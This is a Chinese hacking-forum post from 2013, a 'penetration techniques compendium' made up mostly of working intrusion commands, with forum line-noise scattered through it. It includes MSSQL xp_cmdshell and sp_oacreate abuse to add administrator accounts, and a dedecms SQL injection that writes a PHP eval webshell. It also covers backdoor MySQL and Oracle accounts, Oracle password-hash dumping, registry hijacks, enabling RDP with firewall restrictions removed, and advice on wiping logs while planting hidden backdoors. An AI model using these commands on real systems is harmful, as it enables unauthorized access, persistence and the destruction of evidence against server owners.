找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4929|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
7 ^5 |; _' A' F( D
1.net user administrator /passwordreq:no
4 f4 \+ {& y2 Q3 I这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
& v1 I1 I7 K1 [) r( R4 {2.比较巧妙的建克隆号的步骤: }5 q9 R! H2 E6 f- y& l9 _1 O
先建一个user的用户
: |& k- K! ~$ Z& ?' |然后导出注册表。然后在计算机管理里删掉
6 h" k' {% z' ]+ n( l; r/ r' e在导入,在添加为管理员组
6 N0 }5 b2 W7 l5 [/ N/ E  \8 F3.查radmin密码, n- c# g! A3 |
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
/ C4 p+ f2 m! }  ]1 p0 v$ _4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]6 W' w5 M/ n# C. ]" @5 w
建立一个"services.exe"的项3 I' \! ]# [! A, ]* H0 N7 F
再在其下面建立(字符串值)
, T6 f: H/ n4 L/ v/ d键值为mu ma的全路径% L" a8 j2 @" `: N/ S8 a
5.runas /user:guest cmd
7 N" q9 H2 I! H测试用户权限!
% w+ {7 f& j3 J' c" P: Q6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
, ~! i# L( U4 O7 o1 O- ?) ^7.入侵后漏洞修补、痕迹清理,后门置放:! v- c+ p- z( f5 s9 p- W+ q6 G) h
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
2 Y, a! Y4 q7 K0 ]- M$ A; q6 V8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
) A- r5 t0 K' S, h( G% f* }+ o$ ^& Y* e; A
for example. K* _: I: O( Q: ~( F( f

1 z- G, D5 U. K0 |% kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
! E; O  w' b# L9 \7 X5 u& C. h3 O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
; i* c- W# f) c% K1 U% ~& F& \- P$ u
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
- u9 Y) b  g" ~5 Y8 C如果要启用的话就必须把他加到高级用户模式0 a5 \) F) Y$ S& z( }8 S" I
可以直接在注入点那里直接注入
2 R( A. ]" X  {4 Mid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--' l) U! s$ H, V( n$ W% {) u
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
. r7 n% K% s* ^$ [' K' t8 ^1 X或者
" k- i/ r- `1 r8 ^6 b  Dsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
/ V) @7 L/ F; q5 K8 c$ L来恢复cmdshell。
* R- j6 m% j0 t. V. h% g) r. i" ~2 y; z; a* d" P7 v# K  N0 d/ j
分析器0 m# O" ^& a; v( _! a& V- Y
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
# Y) w' Z* f# _" n4 Y2 x2 w/ T+ T然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")& t( ~( d, j% ^6 z, Q9 E8 s9 A
10.xp_cmdshell新的恢复办法! [0 d' a1 c& l: U
xp_cmdshell新的恢复办法' I+ o) u9 `: w; A/ f$ W
扩展储存过程被删除以后可以有很简单的办法恢复:
4 R. d( T& A7 V  O5 s8 V删除
0 J# j' h+ [, k0 I0 `7 idrop procedure sp_addextendedproc
, I5 l) \& ?: J2 {& pdrop procedure sp_oacreate
/ R# h5 w" X  w+ vexec sp_dropextendedproc 'xp_cmdshell'0 V/ M8 ^7 m. D  @& l3 g- E

& S" H, ]1 C; W5 |恢复, G& L1 n) O0 p2 W# r9 w' e) t
dbcc addextendedproc ("sp_oacreate","odsole70.dll")0 O+ V" d* ]% A( u) |8 x
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")+ z+ u' k; h! A" L9 p2 i3 P

% g. V. l$ F! T! c* G' o这样可以直接恢复,不用去管sp_addextendedproc是不是存在% \! Y# C, f1 S& i" ]4 _- b! k0 \

7 }# ?/ W& ^7 V" c+ M-----------------------------
1 f# y2 D' n# ^1 }3 T1 e) s
* ?5 W. M7 \. O4 A* S删除扩展存储过过程xp_cmdshell的语句:
2 r( `6 q! y- yexec sp_dropextendedproc 'xp_cmdshell'2 z5 h& g; A: X; x
# R' n: Y1 D+ [1 E( Z3 B( |4 h
恢复cmdshell的sql语句; ]  H* B. f  a: |) h/ ~8 A
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
! j8 }( B0 k/ N( n, M6 \0 t# ~! H
& M6 ?1 c+ Z. ]7 `! F
8 u# z1 J: y, A1 X: x7 V" O; y开启cmdshell的sql语句
8 [- x& ]( P5 b2 K" [# g" p# U) x' o2 @* s6 t8 x- d
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2 \6 V* }, w+ `9 J) O, `+ G# S: V
; }9 a0 y# X: V- `. S% F1 x% I判断存储扩展是否存在, p/ R* b0 p3 W/ X
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'1 y; X  p+ u1 S& C: r. P3 U- T
返回结果为1就ok- z& ?4 U# P2 U9 X- E2 p

1 T, u. I6 S0 a. F2 {9 Z: c' v# U恢复xp_cmdshell
: \3 s# V+ u0 X/ h  P! y  rexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'9 E3 D& i, N: U+ W+ u6 @
返回结果为1就ok
% M& s# ^9 N3 t5 B6 I- h: C- Y. K# Y$ Z% [$ B- T3 U
否则上传xplog7.0.dll
) u1 `5 ?$ Y! T4 f( r0 r* x4 sexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
* d. D+ a/ P( I/ D( B0 t& H, q' P3 q: K# h5 r# b# j- I, {
堵上cmdshell的sql语句
2 B5 O0 T5 j5 a+ p4 u; N+ r+ tsp_dropextendedproc "xp_cmdshel7 M5 X; U9 g; Y. r' }" t" ]$ o
-------------------------
( F7 v1 b6 \9 j' Y) K清除3389的登录记录用一条系统自带的命令:" l2 f. i* \8 |0 x6 H2 F" Z
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f& g) M( T- p& }" e6 R
7 a8 C# B, A3 |2 \( j
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件% D' B% A+ R  p
在 mysql里查看当前用户的权限1 @! ^+ w* @- f5 U: r
show grants for  + Z+ _! `1 E- I  N$ M

- o) b* h" E1 |( _2 l以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。' Y1 k8 ?0 v; R" e& ^8 p9 D& m% K
, _' Y1 \9 S$ Y& W

6 E( o) s4 I) ?4 b! q0 JCreate USER 'itpro'@'%' IDENTIFIED BY '123';
0 b, @( }/ k* t$ h+ G% G  E
: O0 D3 O0 o! i$ eGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
. Z% e1 k' @  _( S3 K$ b4 `+ _
/ Q7 v! M7 T8 P* DMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 04 n0 _  S# J4 K& i+ W2 y6 y

( R; v  k2 z  a* P+ M; KMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;  g% C6 _  Z0 j+ a# J) ~

9 R# V" S2 F6 `% Y4 C8 c4 y' E' ~搞完事记得删除脚印哟。
0 K. c4 H, t4 k
7 @  t; q+ C; X- zDrop USER 'itpro'@'%';
0 ]6 k0 Z# r& x
  C- x4 v3 c; M; N7 hDrop DATABASE IF EXISTS `itpro` ;
" q9 T. G4 {0 X0 f% m7 [6 C7 v
- h0 ]% x3 X9 b! J& n当前用户获取system权限
* K4 H4 F- V) r5 u/ p& Xsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
7 R: V, n, ]; V* l6 J0 y8 T; i( lsc start SuperCMD/ d/ R" ]# L3 w- W3 v
程序代码+ R& f* B" B9 U5 l. W( w+ |
<SCRIPT LANGUAGE="VBScript">5 F& K+ l# j4 V3 l( ^( W
set wsnetwork=CreateObject("WSCRIPT.NETWORK")1 n3 p* X, u, k2 C% W& g6 B+ C
os="WinNT://"&wsnetwork.ComputerName
8 Q# x5 D# k; W2 ^" {1 bSet ob=GetObject(os)
: P3 B2 x% a6 X* K6 TSet oe=GetObject(os&"/Administrators,group")
, z/ ]! Z/ o2 M6 N" X2 L! G' eSet od=ob.Create("user","nosec")) y9 B0 O: Y' d
od.SetPassword "123456abc!@#"  `0 m2 {+ `0 T& ?5 S# b
od.SetInfo
$ J! W5 c( {+ x% o3 S9 GSet of=GetObject(os&"/nosec",user)2 V6 [, _8 ?7 N7 _! q
oe.add os&"/nosec"  S3 S8 ?( v6 E& o
</Script>
3 T+ Y' H: C. G  \" ?8 L<script language=javascript>window.close();</script>
. W* M3 e8 C$ g% ?& ^
, o3 A+ ?) P' S0 E$ a( W; {
4 ~$ ]+ a1 ^: a/ D. g2 Z/ E7 K; b9 [& a7 `! _) `

! p' n' I3 E5 ]5 d1 l% w突破验证码限制入后台拿shell
: s6 A0 d, {* g, \# U* u) u" \* B程序代码
  f: o& {) t2 L6 E( GREGEDIT4 - V! z$ B3 t8 I4 S6 r4 J. H* Q
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
: }5 r4 Z& F4 z1 \. D"BlockXBM"=dword:000000008 M$ S8 }0 n2 P
$ C: D9 Q; L0 V* B
保存为code.reg,导入注册表,重器IE
* F  y2 e  A) H2 f3 d9 m0 j/ p就可以了- Y# y1 r3 ?* f! ^
union写马( b. x2 T8 M$ d  ?+ X0 V/ }7 q
程序代码
" f( J! q& y3 ]  @. ^www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
* B( C0 Y/ q5 l( K8 V
/ x+ D+ e+ b9 z" a' `/ o应用在dedecms注射漏洞上,无后台写马, f/ W7 ?9 Z7 }# l. R3 \
dedecms后台,无文件管理器,没有outfile权限的时候
" a" A& a- k' k( H! k- d在插件管理-病毒扫描里5 L. m0 r4 }: |* n' {' R
写一句话进include/config_hand.php里
) \2 A% q) d) C7 ?( L8 K程序代码8 {9 _# f5 u9 |4 ^# z" T% S" s
>';?><?php @eval($_POST[cmd]);?>
6 m$ Y& S' b6 }4 }& J- H) e% V
6 m1 C1 f4 v, C! f7 [1 x7 ?" {8 ]2 \, a) Z+ t
如上格式0 W' \8 n6 ^" L$ b$ L

: E1 p* G4 b: E6 B. H; moracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
2 f3 d" _) i! O0 @2 R8 Q) f* G2 M程序代码
/ H! k+ p* h3 zselect username,password from dba_users;6 r( e5 V+ y- T
) `# }& ]" H" V: Q2 r% S' a+ W
7 ^. K- o$ N# d( V2 U
mysql远程连接用户/ T& E, B1 _5 u% K
程序代码
$ K1 q0 r( J! b' N  W" _
/ E: e2 v' A( ~; QCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';; ]" K3 k; C: @( b& N
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION4 a3 _9 L" H# `! a
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
% H7 U. C% w: vMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
1 K, z& }) C- G" E8 M% o" U* p
+ g$ O8 Q# W' a' Q/ O1 y  g# ?* c! Q

3 Q" `6 v$ Q" K; k& ], X5 E5 w
" S- k1 _2 s" x# M: d% S5 @; U3 A- zecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0. K! Y3 }% z4 J* T) \: n- \
, c4 L1 {' d' p& r* |
1.查询终端端口
3 n' [; v8 a5 i" M: t/ \6 _4 E$ u) A4 Z" C/ J+ k. S- r3 Z0 Y
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
! m, b, _; |) K, L0 g8 A0 [- e2 O3 a- u; }5 f, q
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"* X! h4 l1 W: @2 E8 I& V! i
type tsp.reg
# h$ z5 U$ P' ]2 g3 ~0 p7 ^
8 X- A+ c; W* b+ O9 Q2.开启XP&2003终端服务
6 E+ x+ n; ?/ a# M8 e: L( M, K6 j- b6 @) i2 w$ a* I8 O" b3 U

8 u8 b' O% j; }  x, `5 `2 a7 aREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f. J4 ]  v4 [2 d% Y8 J
5 N' ~3 \8 C2 b0 a: i; t( G
1 H+ c" O  p; c* r% d% e- z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f4 ?8 ~% b) b5 i/ y- S

  g* @2 X: w# M$ E2 d, t- M3.更改终端端口为20008(0x4E28)
2 p/ v' o, j, j; O4 ^3 c5 U( `( i
* ?7 Z8 F' g& }1 Y3 M% KREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
: w+ M7 D  y1 t$ h- Z( |( w' K7 \% D. ?1 K# U6 @
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
' _8 F7 [4 ~) Y( e, Z- j/ r
* T2 F. O/ ^- z. y6 @4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制7 C' i3 I2 `  K, g  e
, V" G( h; D: S- v" e. j& o
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
5 q6 `; u+ r( x
. W1 i7 Z: T- y3 C2 I% |; Z
; L; W, S& z  T  I: b! _% M9 M5.开启Win2000的终端,端口为3389(需重启)
$ Y/ Z% r& l+ C0 c8 l6 |5 N0 T7 c$ @, I$ _) I2 f* W& @
echo Windows Registry Editor Version 5.00 >2000.reg
7 Q, u5 B( L2 z  Q0 t7 _$ Oecho. >>2000.reg
$ B5 F1 r& I8 cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
" [1 A$ J$ I: C4 Hecho "Enabled"="0" >>2000.reg 2 T# h- W- D, ^- G# \" r
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
& c9 f5 E( [4 N9 {' Becho "ShutdownWithoutLogon"="0" >>2000.reg
  Z+ L( ?- x% t! g" }echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
$ O" h! q* C. \( F% D% C' Uecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg . G" \2 h; G3 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 6 t2 P, X+ }/ u7 f2 W0 T- e8 I" B4 |
echo "TSEnabled"=dword:00000001 >>2000.reg 1 o) S4 B& m5 @. v# x6 ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg # r8 X8 }' b% Z. _# D1 }. u& R6 E
echo "Start"=dword:00000002 >>2000.reg
+ s# B- }/ n! R3 K  k. y. eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
9 T9 t6 q3 I) j, d5 @! Qecho "Start"=dword:00000002 >>2000.reg ) r3 a( x3 |; V
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 6 o, W4 q. T0 b, h
echo "Hotkey"="1" >>2000.reg
6 C( y; d( l* E+ j4 @+ S: a; \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg # `0 ^0 V' u0 F- E! x6 p
echo "ortNumber"=dword:00000D3D >>2000.reg
5 w4 T  D9 p- V4 X" Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
& q$ ?7 Z- l9 O+ Wecho "ortNumber"=dword:00000D3D >>2000.reg5 i$ R" u+ D5 \( j5 {) S: E/ o
- P- n. }+ ^3 }& ^
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)7 A" P: b4 V( s4 o% k) J7 j1 ^: @
2 Q, @- [, {% Y0 j' z# e
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf: b# R: N9 C) _9 z" e: i
(set inf=InstallHinfSection DefaultInstall). K. a) z: _' d/ T. l9 u3 w/ D
echo signature=$chicago$ >> restart.inf
2 D, U: e' _9 a7 V& ]$ m8 vecho [defaultinstall] >> restart.inf: Z9 M2 B# n2 F8 b# Y
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7 i% k! u: y! d1 z- [# ~
- S6 X# C' {, V( E9 I7 M$ N
" c2 H" T" q4 A% R; c7.禁用TCP/IP端口筛选 (需重启)
9 f; P$ D# P& y* T; f& h1 c
" \  q* g, f% {: h$ W6 w1 LREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f" v; m  j# _; s

$ K8 |4 F! ?, r7 e9 I6 `8.终端超出最大连接数时可用下面的命令来连接
) {0 e. x  m" Q- F+ B4 ?* F1 C
4 P0 _8 C7 S# A% mmstsc /v:ip:3389 /console1 y: n: T/ ?: K7 H3 n. p( h
- F8 o) e# a( y, O2 ^+ M* }& n
9.调整NTFS分区权限8 O1 L7 I. u5 \7 E0 [+ g+ r
6 C2 v' R8 D) ^; ^. L' g3 c4 ]
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)  u, G9 G% S" Y6 _/ s1 n4 e, Y% x

6 R4 t3 E' X3 Ncacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
6 P2 T; r" c8 t! s( Z; G. P; @4 Y3 j; \9 z4 c, Z; }" X
------------------------------------------------------- {5 g, t$ `9 _7 m
3389.vbs
! Z' P* L5 Q8 g1 VOn Error Resume Next) c( I# |* V5 X! `
const HKEY_LOCAL_MACHINE = &H80000002
2 ~- T4 ~! S" ~: M; M6 I' s0 I8 xstrComputer = "."5 v( F, ~" J* V4 s1 f- ^& O5 C
Set StdOut = WScript.StdOut
8 S2 t8 N* E% p! ?3 ]+ ESet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_; s: x  M  W% C: |7 @
strComputer & "\root\default:StdRegProv")
# A3 X' ?9 t2 x2 y. lstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"$ d, Y1 x! y# n. h8 r
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath0 s) o3 e2 ^9 w) G# i
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"% K# T0 k" F. O' N: C  q6 ]& O
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
9 M8 z$ q9 h. v1 k3 }strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp". ]& p" z) B' w* q2 i0 }
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
( G1 [2 x  e$ h+ v  w! x' ~strValueName = "fDenyTSConnections"
  s3 [1 j, }; BdwValue = 02 c. P$ A% Z" L
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
& H" e5 R5 y  i  p  Z; ^strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"" |1 L/ @# y( X6 P# ^
strValueName = "ortNumber"  J+ F# ?; O+ u$ P# G( ?4 E
dwValue = 33892 X3 _% P! h. |2 ~& V" y9 F
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue. x. V4 ?& U% O' q& K
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
4 g6 L7 M5 N% H0 ]$ d. IstrValueName = "ortNumber"
5 L  p# @# s3 X) f7 gdwValue = 3389) Z- u" Z% t: s) \9 S' V- _
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
6 ], q' r* k- z/ A0 |7 S* D2 ZSet R = CreateObject("WScript.Shell") # l" e4 T& F2 u* D( b- ^
R.run("Shutdown.exe -f -r -t 0")
& K+ [. U) \+ B& x$ N! p* I4 X# B7 l7 |7 q; E. y+ F
删除awgina.dll的注册表键值
* i! @( |' c3 H) V程序代码
* Y$ _; d; a3 D3 r  A( j' {6 r! ?. f6 o
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
) I9 O$ n6 x3 `, T* x$ U: K, u: G% C6 J6 O6 m' l9 J

; D2 X7 `$ K( w% g7 u9 S% ]1 X0 P3 {+ R' l+ T! M1 L8 _7 S# x
$ e8 X4 ~: f! ~5 w" {; u3 N/ Q  k
程序代码
- H" u4 _) W. b; x1 oHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash) C# ]" V( j0 l7 n

  T) T2 C" a, T) a3 E* K2 R设置为1,关闭LM Hash
& c$ g6 o9 k$ v( U+ o- E% ?4 s, H2 X
数据库安全:入侵Oracle数据库常用操作命令
! p, d% @/ n3 o" J9 |; }: C! |最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。. r  i& [) v) L8 q
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。5 e% X& ]: J7 F- X# n0 F4 G
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
. G( F% n% j2 p9 M; @3、SQL>connect / as sysdba ;(as sysoper)或
. s" _/ d9 @" \7 L& w3 V( Zconnect internal/oracle AS SYSDBA ;(scott/tiger). `' c: @% g( o7 |, s4 k
conn sys/change_on_install as sysdba;# ~* r" d4 l- ]
4、SQL>startup; 启动数据库实例
; o$ K( h, u- I5 [5、查看当前的所有数据库: select * from v$database;
5 g* V% V3 D( ], b/ Mselect name from v$database;
# S0 i( m9 V9 t/ Z6、desc v$databases; 查看数据库结构字段
6 W1 ^! k8 u! Q$ z  x5 J" E2 o' [; f" v7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
4 U! i3 L2 U/ I/ vSQL>select * from V_$PWFILE_USERS;7 p6 n* t5 n1 k
Show user;查看当前数据库连接用户; N" S3 ?( j* U' M
8、进入test数据库:database test;
) {& M0 o) R* v$ ^. O0 Y9、查看所有的数据库实例:select * from v$instance;
5 j, U6 m0 D, y8 s3 l如:ora9i
# g" h8 S. C% B  _+ y10、查看当前库的所有数据表:
+ K+ {  r# s3 s& QSQL> select TABLE_NAME from all_tables;
. K$ z9 l6 P6 G% J, j' Qselect * from all_tables;) G# |* Q! T, r( {
SQL> select table_name from all_tables where table_name like '%u%';
# @# b- a: D: L/ v3 l: N% zTABLE_NAME
7 K. q( `: E3 Q. t( \------------------------------/ m3 X* n/ H$ Q" H
_default_auditing_options_2 l5 S4 M' j* X) K4 f& s
11、查看表结构:desc all_tables;* {1 N3 g; B8 M3 M/ }
12、显示CQI.T_BBS_XUSER的所有字段结构:
5 f+ v7 Z. c, p7 J5 Z8 adesc CQI.T_BBS_XUSER;1 ^& ^; ]# U8 g8 B
13、获得CQI.T_BBS_XUSER表中的记录:, H4 D1 ]# a* h3 a) v3 \6 i
select * from CQI.T_BBS_XUSER;* L2 n# ~% b2 b5 ~6 z( V' N- j6 d
14、增加数据库用户:(test11/test)
, _; ]$ T0 z8 s; H( Z7 v% q' n( N* q2 ^create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
  @0 o9 p( ?5 k( H8 [& ]8 ?' d15、用户授权:" T; Y) N# F( s% w/ J" t
grant connect,resource,dba to test11;
( O- i+ b# d% ]+ E, j2 Wgrant sysdba to test11;' U- s, k: m4 j! T& n
commit;7 J" U. m- m5 S: L
16、更改数据库用户的密码:(将sys与system的密码改为test.)$ J' B, ]7 x# R1 f1 S7 R# @
alter user sys indentified by test;( ]' Y5 i" ^) s, n* d
alter user system indentified by test;# r) H0 I7 K7 w4 R
6 s# f! m+ c1 H
applicationContext-util.xml
9 _; ]- |" O# p- Q4 |applicationContext.xml- a6 Q/ R8 f# t/ A9 [+ K
struts-config.xml
% t! K! V: R8 u: e6 p1 U) W  G8 Jweb.xml
7 m$ x1 j3 ~$ q( m, Tserver.xml, M4 M! k  r1 {* D% {! B8 i2 _- C5 p
tomcat-users.xml
# m$ P/ A  y1 g+ Z3 khibernate.cfg.xml
6 C# a, |/ t& ]9 m% e( Vdatabase_pool_config.xml! u+ [% l! D$ A! c' H# ~) z  N- P

: L& [* T/ B! w$ Q( b6 [) b% u* c) p" [# w- V
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置1 U; ?$ x) ?8 s5 i
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
, C" L3 K7 c* U" h, o' d, W\WEB-INF\struts-config.xml  文件目录结构5 j/ f6 I/ i% U# ]' T/ U
) W8 C+ g7 N6 q  |+ F
spring.properties 里边包含hibernate.cfg.xml的名称
% m3 Q; _' [5 q3 @/ l7 ~
  n4 J/ w9 o3 _( A. V! H- R" n+ O- ]; q3 D1 R# p$ p
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
+ F! E6 G0 _! d  P( Q  l: n, w3 m5 V' g9 l
如果都找不到  那就看看class文件吧。。
' v/ }: a4 p  k! H* w6 l: J1 n4 T" Q7 A- F
测试1:
  I, v) r" Y+ d+ k  s* z- P' ]SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
) H2 h( X. Z: \, q& y! b
6 P4 B* ]6 i+ L/ C; M测试2:. G* v. N0 A$ l. C

# @" x& ]" f3 o$ ncreate table dirs(paths varchar(100),paths1 varchar(100), id int)2 h+ |# o. H  `% x( l3 D9 a
0 T  _# \2 {9 h' H# U6 E3 n
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
! z6 d) m' i( ~1 z9 ~0 D- P! u. y' ^4 f
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1  M. I- O' s7 Z4 r) R
5 _. R/ G8 ?$ n) {  ]
查看虚拟机中的共享文件:
* _9 k( h' u0 h2 e* ~" r3 n8 L+ ^; p" }在虚拟机中的cmd中执行6 {# ?: o  J" z; y$ Y; E
\\.host\Shared Folders5 `/ L8 l* h8 k, }5 R; C" w1 a/ z
! R: |) Y0 z& }
cmdshell下找终端的技巧' [9 |* @6 A) O$ m' F
找终端:
3 e5 U5 P6 I6 E4 T. I$ }第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
+ [* K) p: t+ M" D  t   而终端所对应的服务名为:TermService
/ w. I/ M  |6 ^# N, i第二步:用netstat -ano命令,列出所有端口对应的PID值! ! z% T- p7 f0 r" p8 T3 F: m$ a
